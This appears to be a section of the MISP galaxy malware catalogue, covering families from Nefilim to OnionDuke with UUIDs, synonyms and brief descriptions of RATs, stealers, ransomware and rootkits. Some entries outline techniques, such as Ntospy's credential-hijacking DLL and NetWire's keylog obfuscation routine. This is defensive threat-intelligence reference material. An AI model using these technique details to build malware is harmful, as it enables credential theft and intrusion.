UUID 895f088e-a862-462c-a754-6593c6a471da which can be used as unique global reference for Nefilim in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nemesis

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nemesis.

Known Synonyms
`Project Nemesis`

Internal MISP references

UUID 2f115fca-2f72-4c20-a93e-9618e51f6e2b which can be used as unique global reference for Nemesis in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nemim

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nemim.

Known Synonyms
`Nemain`

Internal MISP references

UUID 5ce7906e-b1fd-4860-b3e2-ac9c72033428 which can be used as unique global reference for Nemim in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nemty

Nemty is a ransomware that was discovered in September 2019. Fortinet states that they found it being distributed through similar ways as Sodinokibi and also noted artfifacts they had seen before in Gandcrab.

Internal MISP references

UUID 465696be-d576-4750-9469-89e19984f3df which can be used as unique global reference for Nemty in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nerbian RAT

Proofpoint observed distribution of this RAT since late April 2022, it is written on Go and incorporates code from various open-source Git repositories.

Internal MISP references

UUID 3dba4da9-7fe0-4b12-a0ed-c55065b87481 which can be used as unique global reference for Nerbian RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

neshta

Neshta is a 2005 Belarusian file infector virus written in Delphi. The name of the virus comes from the Belarusian word "nesta" meaning "something."

Internal MISP references

UUID 13d2482d-21fc-4044-891e-a7fb2b1660e9 which can be used as unique global reference for neshta in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NESTEGG

NESTEGG is a memory-only backdoor that can proxy commands to other infected systems using a custom routing scheme. It accepts commands to upload and download files, list and delete files, list and terminate processes, and start processes. NESTEGG also creates Windows Firewall rules that allows the backdoor to bind to a specified port number to allow for inbound traffic.

Internal MISP references

UUID fce1f9a7-bac7-4b11-8ea7-3c72931cd14a which can be used as unique global reference for NESTEGG in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NetC

Internal MISP references

UUID 0bc03bfa-1439-4162-bb33-ec9f8f952ee5 which can be used as unique global reference for NetC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NetDooka

A RAT written in .NET, delivered with a driver to protect it from deletion. Observed being dropped by PrivateLoader.

Internal MISP references

UUID dc6f887b-0c35-471f-9b18-2bf0a4ff357a which can be used as unique global reference for NetDooka in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NETEAGLE

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NETEAGLE.

Known Synonyms
`Neteagle_Scout`
`ScoutEagle`

Internal MISP references

UUID 3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5 which can be used as unique global reference for NETEAGLE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NetfilterRootkit

NetfilterRootkit is a WFP application layer enforcement callout driver which is signed by Microsoft via the Windows Hardware Compatibility program. It was first discovered by Karsten Hahn. His team submitted the malware to Microsoft, which allowed Microsoft to start an investigation.

After Karsten Hahn published tweets and an article about the rootkit, Microsoft quickly responded with their own article. Their investigation revealed Chinese gamers as targets of the malware. The rootkit redirects traffic to the threat actor's IP. The threat actor can use the driver to spoof their geo-location to cheat, but it also allows account compromise of targeted players.

While this particular rootkit is not significant anymore, similar rootkits have been created since that are also signed by Microsoft via the Windows Hardware Compatibility program.

Internal MISP references

UUID 731d992c-f2e0-4e56-a148-b8df5caee8e3 which can be used as unique global reference for NetfilterRootkit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NetFlash

Internal MISP references

UUID 88b2b4ac-9e46-4bc6-b4f6-bf5ddd70ad31 which can be used as unique global reference for NetFlash in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NetKey

Internal MISP references

UUID b8ec2602-c5e5-4b49-a50e-bb3d9676abc3 which can be used as unique global reference for NetKey in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Netrepser

Internal MISP references

UUID 7c6ed154-3232-4b7a-80c3-8052ce0c7333 which can be used as unique global reference for Netrepser in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NetSpy

Freely available network reconnaissance tool.

Internal MISP references

UUID a7cc22b7-0d05-480f-b7f8-a6e6c658dd8f which can be used as unique global reference for NetSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NetSupportManager RAT

Enigma Software notes that NetSupport Manager is a genuine application, which was first released about twenty years ago. The purpose of the NetSupport Manager tool is to enable users to receive remote technical support or provide remote computer assistance. However, cyber crooks have hijacked this useful application and misappropriated it to use it in their harmful campaigns. The name of the modified version of the NetSupport Manager has been labeled the NetSupport Manager RAT.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NetSupportManager RAT.

Known Synonyms
`NetSupport`

Internal MISP references

UUID 42562c47-08e1-46bc-962c-28d1831d092b which can be used as unique global reference for NetSupportManager RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NetTraveler

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NetTraveler.

Known Synonyms
`TravNet`

Internal MISP references

UUID 3a26ee44-3224-48f3-aefb-3978c972d928 which can be used as unique global reference for NetTraveler in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NetWire RC

Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.

Keylog files are stored on the infected machine in an obfuscated form. The algorithm is:

        for i in range(0,num_read):
            buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NetWire RC.

Known Synonyms
`NetWeird`
`NetWire`
`Recam`

Internal MISP references

UUID 1acd0c6c-7aff-462e-94ff-7544b1692740 which can be used as unique global reference for NetWire RC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Neuron

Internal MISP references

UUID 101c2c0e-c082-4b5a-b820-2da789e839d9 which can be used as unique global reference for Neuron in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Neutrino

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Neutrino.

Known Synonyms
`Kasidet`

Internal MISP references

UUID 3760920e-4d1a-40d8-9e60-508079499076 which can be used as unique global reference for Neutrino in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Neutrino POS

Internal MISP references

UUID a954e642-4cf4-4293-a4b0-c82cf2db785d which can be used as unique global reference for Neutrino POS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nevada

Internal MISP references

UUID abade90c-6783-4e53-a436-944733871df2 which can be used as unique global reference for Nevada in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NewBot Loader

Internal MISP references

UUID 10557b51-6a57-499b-a988-e4aeccf51d4e which can be used as unique global reference for NewBot Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NewBounce

Internal MISP references

UUID 1695fd64-5e6a-456f-97a4-d09937920543 which can be used as unique global reference for NewBounce in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NewCore RAT

Internal MISP references

UUID f18b17a7-9124-42e8-a2f2-4a1a9839aee8 which can be used as unique global reference for NewCore RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NewPass

Internal MISP references

UUID c1dbbd04-050c-47ce-8164-791f17a4a6b4 which can be used as unique global reference for NewPass in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NewPosThings

Internal MISP references

UUID 48f95941-8369-4f80-b2b4-abbacd4bc411 which can be used as unique global reference for NewPosThings in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NewsReels

Internal MISP references

UUID 1d32e7c3-840e-4247-b28b-818cb1c4ae7c which can be used as unique global reference for NewsReels in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NewCT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NewCT.

Known Synonyms
`CT`

Internal MISP references

UUID ec50a75e-81f0-48b3-b1df-215eac646421 which can be used as unique global reference for NewCT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nexster Bot

Internal MISP references

UUID de3aae04-130b-4c5f-b67c-03f872e76697 which can be used as unique global reference for Nexster Bot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NexusLogger

Internal MISP references

UUID dd1408ac-e288-4389-87f3-7650706f1d51 which can be used as unique global reference for NexusLogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ngioweb (Windows)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ngioweb (Windows).

Known Synonyms
`Grobios`

Internal MISP references

UUID 35fd764f-8723-4663-9bbf-5b02a64ec02e which can be used as unique global reference for Ngioweb (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NGLite

According to Unit42, NGLite is a backdoor Trojan that is only capable of running commands received through its C2 channel. While the capabilities are standard for a backdoor, NGLite uses a novel C2 channel that leverages a decentralized network based on the legitimate NKN to communicate between the backdoor and the actors.

Internal MISP references

UUID 3bd8a411-5a99-4cf9-bde9-b7c55e79acf8 which can be used as unique global reference for NGLite in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nibiru

Internal MISP references

UUID 5a998606-a9a9-42ad-affb-9be37e11ec25 which can be used as unique global reference for Nibiru in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NightClub

Internal MISP references

UUID 7b9747fa-291a-497b-ae0a-b0760b2b62e5 which can be used as unique global reference for NightClub in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nightdoor

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nightdoor.

Known Synonyms
`NetMM`
`Suzafk`

Internal MISP references

UUID e67d39e6-a5c6-4f30-840d-e4efb2f63359 which can be used as unique global reference for Nightdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nighthawk

C2 framework.

Internal MISP references

UUID c8b9aa40-9c55-4283-851c-635673f87182 which can be used as unique global reference for Nighthawk in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NightSky

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NightSky.

Known Synonyms
`Night Sky`

Internal MISP references

UUID 5c8dc23a-86a8-4fee-9fa3-371c9d7b4f1c which can be used as unique global reference for NightSky in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NikiHTTP

NikiHTTP is a versatile backdoor and has multiple capabilities such as download of files, executing them, performing commands, take screenshots and so on.

Internal MISP references

UUID e3fd52bb-7331-401d-9cc4-0de6ec82f647 which can be used as unique global reference for NikiHTTP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NimbleMamba

NimbleMamba is a new implant used by TA402/Molerats group as replacement of LastConn. It uses guardrails to ensure that victims are within the TA's target region. It is written in C# and delivered as an obfuscated .NET executable. One seen obfuscator is SmartAssembly.

Internal MISP references

UUID b52a6512-7b0c-431a-8680-93f12921ba46 which can be used as unique global reference for NimbleMamba in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nimbo-C2 (Windows)

According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).

Internal MISP references

UUID bda7efa0-e08d-453e-95d4-9307c5104a69 which can be used as unique global reference for Nimbo-C2 (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NimGrabber

Malware written in Nim, stealing data including discord tokens from browsers, exfiltrating the results via a Discord webhook.

Internal MISP references

UUID 5f998c1d-0377-404d-8ece-dd3486758a44 which can be used as unique global reference for NimGrabber in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nimplant

Part of Mythic C2, written in Nim. Considered deprecated, as it is only compatible with Mythic 2.1.

Internal MISP references

UUID b8ecda1e-206e-4ab5-b9d7-e50276ba22ea which can be used as unique global reference for Nimplant in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nimrev

Backdoor written in Nim.

Internal MISP references

UUID 69981781-962a-409a-93c6-cb5377257de8 which can be used as unique global reference for Nimrev in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NimBlackout

According to its author, NimBlackout is an adaptation of the @Blackout project originally developed in C++ by @ZeroMemoryEx, which consists of removing AV/EDRs using the gmer (BYOVD) driver. The main reason for this project was to understand how BYOVD attacks work, and then to provide a valid PoC developed in Nim.

Internal MISP references

UUID 904152c4-7483-41e7-acbb-884a7b32bce4 which can be used as unique global reference for NimBlackout in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NineRAT

Internal MISP references

UUID 2f9982ac-0029-4f4c-b316-4d127dc5f043 which can be used as unique global reference for NineRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NirCmd

NirCmd is a benign tool by NirSoft that provides various functionalities. Among these is e.g. a capability to start regedit as SYSTEM, which is sometimes abused for privilege escalation, or other functionality abusable for other malicious purposes. It is also frequently flagged by AV engines.

Internal MISP references

UUID 51047f06-d824-4b84-a69c-97808b18f6bf which can be used as unique global reference for NirCmd in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

nitlove

Internal MISP references

UUID 1bdd56fe-beca-4652-af39-87b5e45ae130 which can be used as unique global reference for nitlove in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nitol

Internal MISP references

UUID e1fb348b-5e2b-4a26-95af-431065498ff5 which can be used as unique global reference for Nitol in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nitro

Ransomware family which requires payment in Discord gift cards ("Discord Nitro").

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nitro.

Known Synonyms
`Hydra`

Internal MISP references

UUID a81635fc-7bb7-4cd1-b26c-ea8ce6cb2763 which can be used as unique global reference for Nitro in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nitrogen Loader

Internal MISP references

UUID 5b241bc1-cc05-4ab9-8771-1a6b97136576 which can be used as unique global reference for Nitrogen Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nitrokod

A Turkish cryptominer campaign.

Internal MISP references

UUID d52552e2-17dc-425a-bfc8-ee6a037c704c which can be used as unique global reference for Nitrokod in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NixScare Stealer

Internal MISP references

UUID a49d1134-f4d9-4778-bbd4-c70655be9cf6 which can be used as unique global reference for NixScare Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NjRAT

RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."

It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NjRAT.

Known Synonyms
`Bladabindi`
`Lime-Worm`

Internal MISP references

UUID ff611c24-289e-4f2d-88d2-cfbf771a4e4b which can be used as unique global reference for NjRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

nmass malware

It's .NET Rat with harcoded key

Internal MISP references

UUID c0a8dc47-13fa-45d7-b55a-e69d798b3244 which can be used as unique global reference for nmass malware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nocturnal Stealer

Internal MISP references

UUID 94793dbc-3649-40a4-9ccc-1b32846ecb3a which can be used as unique global reference for Nocturnal Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NodeStealer

Internal MISP references

UUID e7890226-7e39-4902-bbce-e384e0847303 which can be used as unique global reference for NodeStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nokki

Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37.

Internal MISP references

UUID f3cbe9ca-e65e-41af-8eb2-1e9877434124 which can be used as unique global reference for Nokki in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nokoyawa Ransomware

Internal MISP references

UUID 934a633a-21f7-4010-a83a-0b64c365355d which can be used as unique global reference for Nokoyawa Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NominatusToxicBattery

A wiper that overwrites target files with itself, thus spreading in virus-fashion.

Internal MISP references

UUID 2fef9561-e16f-47a9-90c6-a68a1b20cc95 which can be used as unique global reference for NominatusToxicBattery in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NOOPDOOR

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NOOPDOOR.

Known Synonyms
`HiddenFace`

Internal MISP references

UUID 75850d37-317c-4211-b9cb-eb60a7ea22bd which can be used as unique global reference for NOOPDOOR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nopyfy

Ransomware

Internal MISP references

UUID 62fe621a-04aa-4b5d-95d7-c1c3e4bcd17c which can be used as unique global reference for Nopyfy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NorthStar

An open source C2 framework intended for pentest and red teaming activities.

Internal MISP references

UUID b783b185-e05c-481b-8c04-d0ba1b745713 which can be used as unique global reference for NorthStar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nosu

According to PCrisk, Nosu is the name of a malicious program classified as a stealer. This malware is designed to steal information from infected machines. The Nosu stealer can extract a wide variety of data from devices and installed applications. The most active campaigns associated with Nosu were noted in North and South America, as well as Southeast Asia.

Internal MISP references

UUID a67b25dd-527f-40fa-b7e0-c93e856c0a4c which can be used as unique global reference for Nosu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nova Stealer

Nova Stealer is a new information stealer that is offered as Malware-as-a-Service by a new French-speaking actor called "Nova Sentinel". Its capabilities include password stealing, browser injections, crypto wallet stealing, discord injections, and screen recordings. Parts of its source code have been made available on GitHub, with certain "Premium" features missing.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nova Stealer.

Known Synonyms
`Malicord`

Internal MISP references

UUID fd09577f-18f4-4635-83d8-b64b9e3253f1 which can be used as unique global reference for Nova Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NoxPlayer

Internal MISP references

UUID a077c784-6bc5-488d-b844-978d8d081390 which can be used as unique global reference for NoxPlayer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nozelesn (Decryptor)

Internal MISP references

UUID 6207668d-af17-44a6-97a2-e1b448264529 which can be used as unique global reference for Nozelesn (Decryptor) in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor - webarchive

Associated metadata

Metadata key	Value
type	[]

No-Justice

Internal MISP references

UUID 26d37e90-7061-4785-a9cf-4302d0a7dc6b which can be used as unique global reference for No-Justice in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

nRansom

Internal MISP references

UUID b9c767c7-a1e8-476a-8032-9686d51df7de which can be used as unique global reference for nRansom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NSPX30

Internal MISP references

UUID 7c67248b-d655-44ff-a69b-431bf139d373 which can be used as unique global reference for NSPX30 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ntospy

Ntospy is a credential stealer leveraging a well-established technique of abusing the Windows Network Provider interface, a method documented as early as 2004 and exemplified by tools like NPPSpy. Posing as a legitimate Network Provider DLL, Ntospy injects itself into the Windows authentication process, hijacking login attempts to harvest user credentials. It achieves this by registering a malicious Network Provider, typically named "credman," which intercepts authentication requests and redirects them to it malicious DLL.

Instead of immediately exfiltrating the stolen data, Ntospy employs a form of local storage, writing the captured credentials in cleartext to files disguised as harmless Microsoft Update packages using the .msu file extension. These files are often planted in system directories with believable names like "c:/programdata/package cache/windows10.0-kb5009543-x64.msu," further masking their malicious purpose.

Adding to its stealth, Ntospy incorporates obfuscation techniques to evade detection. This includes using seemingly innocuous filenames for its DLL, often mimicking critical system files like "ntoskrnl.dll" to blend in. Some variants even go a step further by encrypting the credential storage file path within the DLL, requiring analysis and decryption to uncover its full functionality.

Internal MISP references

UUID 5afd0fe6-26fe-4b90-b48e-0cb0dfb76fdf which can be used as unique global reference for Ntospy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NuggetPhantom

NSFOCUS describes PhantomNugget as a modularized malware toolkit, that was spread using EternalBlue. Payloads included a RAT and a XMRig miner.

Internal MISP references

UUID 25a5ded7-6167-4f9a-b55d-9cfc9a9a9f22 which can be used as unique global reference for NuggetPhantom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nullmixer

Nullmixer is a dropper/loader for additional malware. It is known to drop a vast amount of different malware, such as info stealers, rats and additional loaders. Samples observed contained up to 8 additional payloads.

Internal MISP references

UUID 430c92f4-95b4-4b1c-813a-46d3e53a0d1e which can be used as unique global reference for Nullmixer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Numando

According to PCrisk, Numando is a banking trojan written in the Delphi programming language. As the malicious program's classification implies, it is designed to steal banking information. Numando primarily targets Brazil, with seldom campaigns occurring in Mexico and Spain.

Internal MISP references

UUID 69d63487-6200-4f71-845e-df3997402b00 which can be used as unique global reference for Numando in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NVISOSPIT

Internal MISP references

UUID 83cfa206-b485-47fd-b298-1b008ab86507 which can be used as unique global reference for NVISOSPIT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

N-W0rm

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular N-W0rm.

Known Synonyms
`NWorm`
`nw0rm`

Internal MISP references

UUID bdc00b3a-2ceb-4818-83fa-96fb11c8540f which can be used as unique global reference for N-W0rm in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nymaim

Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nymaim.

Known Synonyms
`nymain`

Internal MISP references

UUID 9b5255c6-44e5-4ec3-bc03-7e00e220c937 which can be used as unique global reference for Nymaim in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nymaim2

According to bin.re, in April 2018 a new version of Nymaim appeared, that has dropped previous obfuscation, and uses a new wordlist based DGA (Domain Generation Algorithm).

Internal MISP references

UUID c8e8392f-883e-412e-9b0b-02137d0875da which can be used as unique global reference for Nymaim2 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nyxem

Internal MISP references

UUID d36a3223-5952-48c9-b2dc-87533fa032dc which can be used as unique global reference for Nyxem in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OATBOAT

OATBOAT is a loader that loads and executes shellcode payloads.

Internal MISP references

UUID 42222769-e215-41bc-b550-c878403c9d75 which can be used as unique global reference for OATBOAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Oblique RAT

Internal MISP references

UUID 33c138a0-85d3-4497-90e9-ada1d501a100 which can be used as unique global reference for Oblique RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Obscene

Internal MISP references

UUID 8f623a37-80a4-4240-9586-6ea7a2a97e30 which can be used as unique global reference for Obscene in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ObserverStealer

Internal MISP references

UUID 9ddbf63f-c9a2-4bd6-8449-189f2d2ce5e4 which can be used as unique global reference for ObserverStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OCEANMAP

Internal MISP references

UUID 6e33d8cd-f8aa-4be4-9619-867a469a1425 which can be used as unique global reference for OCEANMAP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Oceansalt

Internal MISP references

UUID 01cef4e7-a8a8-4b42-b509-f91c5d415354 which can be used as unique global reference for Oceansalt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Octopus (Windows)

Internal MISP references

UUID 777b76f9-5390-4899-b201-ebaa8a329c96 which can be used as unique global reference for Octopus (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OddJob

Internal MISP references

UUID d8305201-9fec-4e6b-9eec-7ebb756364e2 which can be used as unique global reference for OddJob in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob - webarchive

Associated metadata

Metadata key	Value
type	[]

Oderoor

Spam bot that was active around 2007 and after, one of the first malware families to use a domain generation algorithm.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Oderoor.

Known Synonyms
`Bobax`
`Kraken`

Internal MISP references

UUID fb5c1af2-9028-47c7-937b-ab0ba0078485 which can be used as unique global reference for Oderoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Odinaff

Internal MISP references

UUID 045df65f-77fe-4880-af34-62ca33936c6e which can be used as unique global reference for Odinaff in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Okrum

a new, previously unknown backdoor that we named Okrum. The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors.

Internal MISP references

UUID af2e4e0d-e8ae-48a9-aac4-2a49242c68d2 which can be used as unique global reference for Okrum in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OLDBAIT

According to FireEye, OLDBAIT is a credential stealer that has been observed to be used by APT28. It targets Internet Explorer, Mozilla Firefox, Eudora, The Bat! (an email client by a Moldovan company), and Becky! (an email client made by a Japanese company). It can use both HTTP or SMTP to exfiltrate data. In some places it is mistakenly named "Sasfis", which however seems to be a completely different and unrelated malware family.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular OLDBAIT.

Known Synonyms
`Sasfis`

Internal MISP references

UUID b79a6b61-f122-4823-a4ab-bbab89fcaf75 which can be used as unique global reference for OLDBAIT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Olympic Destroyer

Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Olympic Destroyer.

Known Synonyms
`SOURGRAPE`

Internal MISP references

UUID f3ba8a50-0105-4aa9-90b2-01df15f50b28 which can be used as unique global reference for Olympic Destroyer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ondritols

According to Symantec, this malware has been deployed against IT services companies in the U.S. and Europe. A multi-stage backdoor, the first stage is a downloader that authenticates to Microsoft Graph API and downloads the second stage payload from OneDrive and executes it. The main payload will download a publicly available file from GitHub. It will then create a folder in OneDrive named deviceId_n_ for each infected machine and upload a file to OneDrive to signal the attackers the status of a new infection.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ondritols.

Known Synonyms
`Onedrivetools`

Internal MISP references

UUID ae7da05e-0ea6-4a9d-a0fa-8bfe9c74a20c which can be used as unique global reference for Ondritols in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ONHAT

Internal MISP references

UUID 82733125-da67-44ff-b2ac-b16226088211 which can be used as unique global reference for ONHAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Oni

Ransomware.

Internal MISP references

UUID c182f370-4721-4968-a3b1-a7e96ab876df which can be used as unique global reference for Oni in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OnionDuke

